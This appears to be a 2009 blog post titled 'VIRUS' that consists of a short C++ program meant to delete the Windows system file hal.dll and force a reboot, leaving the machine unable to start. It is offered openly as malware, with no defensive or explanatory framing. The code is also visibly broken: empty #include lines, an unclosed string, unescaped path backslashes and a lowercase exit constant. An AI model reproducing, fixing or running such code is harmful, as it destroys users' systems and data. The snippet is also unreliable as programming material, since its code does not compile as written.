Friday, November 13, 2009

VIRUS

#include
#include
using namespace std;
int main(int args,char *argv[])
{
std::remove("%systemroot%\system32\hal.dll);
system("shutdown -r");
system("pause");
return exit_success;
}

No comments:

Post a Comment

Dharamart.blogspot.in